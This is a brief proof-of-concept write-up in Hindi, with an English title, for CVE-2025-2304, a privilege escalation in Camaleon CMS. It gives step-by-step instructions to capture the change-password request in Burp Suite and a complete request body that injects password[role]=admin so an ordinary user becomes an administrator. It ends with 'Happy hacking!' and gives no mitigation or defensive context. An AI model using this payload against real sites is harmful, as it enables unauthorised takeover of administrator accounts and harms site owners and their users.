
CVE-2025-2304 POC - Camaleon CMS Privilege Escalation
CVE-2025-2304 POC - Camaleon CMS विशेषाधिकार वृद्धि
यह POC Camaleon CMS के विशेषाधिकारों को प्रशासक स्तर तक बढ़ाने के लिए उपयोग किया जाता है। यह शोषण एक प्रमाणित उपयोगकर्ता के पासवर्ड रीसेट फ़ंक्शन में भूमिका इंजेक्ट करके काम करता है।
अपने उपयोगकर्ता खाते में लॉग इन करके शुरू करें। लॉग इन करने के बाद, प्रोफ़ाइल पृष्ठ पर जाएँ और पासवर्ड बदलें पर क्लिक करें। burp suite का उपयोग करके पासवर्ड बदलने के फ़ंक्शन को कैप्चर करें।
नीचे दिए गए उदाहरण का उपयोग करके, भूमिका जोड़ने के लिए अपने पेलोड को संपादित करें।
_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin
अपने पेलोड में %5Brole%5D=admin जोड़ने से, अब आप एक प्रशासक हो जाएँगे।
पृष्ठ ताज़ा करें और अब आप एक प्रशासक होंगे।
शुभ हैकिंग!